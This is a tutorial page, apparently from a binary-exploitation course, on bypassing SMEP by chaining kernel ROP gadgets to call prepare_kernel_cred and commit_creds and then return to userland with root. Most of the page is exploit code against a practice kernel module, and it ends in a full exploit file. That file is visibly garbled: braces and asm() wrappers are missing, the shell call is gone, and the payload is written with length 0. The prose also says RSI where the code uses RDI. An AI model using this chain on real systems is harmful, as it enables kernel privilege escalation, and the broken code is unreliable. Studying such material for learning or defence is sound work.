Binary Exploitation Kernel SMEP Kernel ROP - Privilege Escalation in Kernel Space Bypassing SMEP by ropping through the kernel
The previous approach failed, so let's try and escalate privileges using purely ROP.
Modifying the Payload
Calling prepare_kernel_cred()
First, we have to change the ropchain. Start off with finding some useful gadgets and calling prepare_kernel_cred(0)
Copy uint64_t pop_rdi = 0xffffffff811e08ec;
uint64_t swapgs = 0xffffffff8129011e;
uint64_t iretq_pop1 = 0xffffffff81022e1f;
uint64_t prepare_kernel_cred = 0xffffffff81066fa0;
uint64_t commit_creds = 0xffffffff81066e00;
int main() {
// [...]
// overflow
uint64_t payload[7];
int i = 6;
// prepare_kernel_cred(0)
payload[i++] = pop_rdi;
payload[i++] = 0;
payload[i++] = prepare_kernel_cred;
// [...]
Now comes the trickiest part, which involves moving the result of RAX to RSI before calling commit_creds()
Moving RAX to RDI for commit_creds()
This requires stringing together a collection of gadgets (which took me an age to find). See if you can find them!
I ended up combining these four gadgets:
Copy 0xffffffff810dcf72: pop rdx; ret
0xffffffff811ba595: mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
0xffffffff810a2e0d: mov rdx, rcx; ret;
0xffffffff8126caee: mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;
Gadget 1 is used to set RDX to 0
, so we bypass the jne
in Gadget 2 and hit ret
Gadget 2 and Gadget 3 move the returned cred struct from RAX to RDX
Gadget 4 moves it from RAX to RDI, then compares RDI to RDX. We need these to be equal to bypass the jne
and hit the ret
Copy uint64_t pop_rdx = 0xffffffff810dcf72; // pop rdx; ret
uint64_t mov_rcx_rax = 0xffffffff811ba595; // mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
uint64_t mov_rdx_rcx = 0xffffffff810a2e0d; // mov rdx, rcx; ret;
uint64_t mov_rdi_rax = 0xffffffff8126caee; // mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;
// [...]
// commit_creds()
payload[i++] = pop_rdx;
payload[i++] = 0;
payload[i++] = mov_rcx_rax;
payload[i++] = mov_rdx_rcx;
payload[i++] = mov_rdi_rax;
payload[i++] = commit_creds;
Returning to userland
Recall that we need swapgs
and then iretq
. Both can be found easily.
Copy 0xffffffff8129011e: swapgs; ret;
0xffffffff81022e1f: iretq; pop rbp; ret;
The pop rbp; ret
is not important as iretq
jumps away anyway.
To simulate the pushing of RIP, CS, SS, etc we just create the stack layout as it would expect - RIP|CS|RFLAGS|SP|SS
, the reverse of the order they are pushed in.
Copy // commit_creds()
payload[i++] = swapgs;
payload[i++] = iretq;
payload[i++] = user_rip;
payload[i++] = user_cs;
payload[i++] = user_rflags;
payload[i++] = user_rsp;
payload[i++] = user_ss;
payload[i++] = (uint64_t) escalate;
If we try this now, we successfully escalate privileges!
Final Exploit
Copy // gcc -static -o exploit exploit.c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdint.h>
void get_shell(void){
puts("[*] Returned to userland");
uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rsp;
uint64_t user_rflags;
uint64_t user_rip = (uint64_t) get_shell;
void save_state(){
puts("[*] Saving state");
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_rsp, rsp;"
"pop user_rflags;"
puts("[+] Saved state");
void escalate() {
".intel_syntax noprefix;"
"xor rdi, rdi;"
"movabs rcx, 0xffffffff81066fa0;" // prepare_kernel_cred
"call rcx;"
"mov rdi, rax;"
"movabs rcx, 0xffffffff81066e00;" // commit_creds
"call rcx;"
"mov r15, user_ss;"
"push r15;"
"mov r15, user_rsp;"
"push r15;"
"mov r15, user_rflags;"
"push r15;"
"mov r15, user_cs;"
"push r15;"
"mov r15, user_rip;"
"push r15;"
uint64_t pop_rdi = 0xffffffff811e08ec;
uint64_t swapgs = 0xffffffff8129011e;
uint64_t iretq = 0xffffffff81022e1f; // iretq; pop rbp; ret
uint64_t prepare_kernel_cred = 0xffffffff81066fa0;
uint64_t commit_creds = 0xffffffff81066e00;
uint64_t pop_rdx = 0xffffffff810dcf72; // pop rdx; ret
uint64_t mov_rcx_rax = 0xffffffff811ba595; // mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
uint64_t mov_rdx_rcx = 0xffffffff810a2e0d; // mov rdx, rcx; ret;
uint64_t mov_rdi_rax = 0xffffffff8126caee; // mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;
int main() {
// communicate with the module
int fd = open("/dev/kernel_rop", O_RDWR);
printf("FD: %d\n", fd);
// overflow
uint64_t payload[25];
int i = 6;
// prepare_kernel_cred(0)
payload[i++] = pop_rdi;
payload[i++] = 0;
payload[i++] = prepare_kernel_cred;
// commit_creds()
payload[i++] = pop_rdx;
payload[i++] = 0;
payload[i++] = mov_rcx_rax;
payload[i++] = mov_rdx_rcx;
payload[i++] = mov_rdi_rax;
payload[i++] = commit_creds;
// commit_creds()
payload[i++] = swapgs;
payload[i++] = iretq;
payload[i++] = user_rip;
payload[i++] = user_cs;
payload[i++] = user_rflags;
payload[i++] = user_rsp;
payload[i++] = user_ss;
payload[i++] = (uint64_t) escalate;
write(fd, payload, 0);
Last updated 8 months ago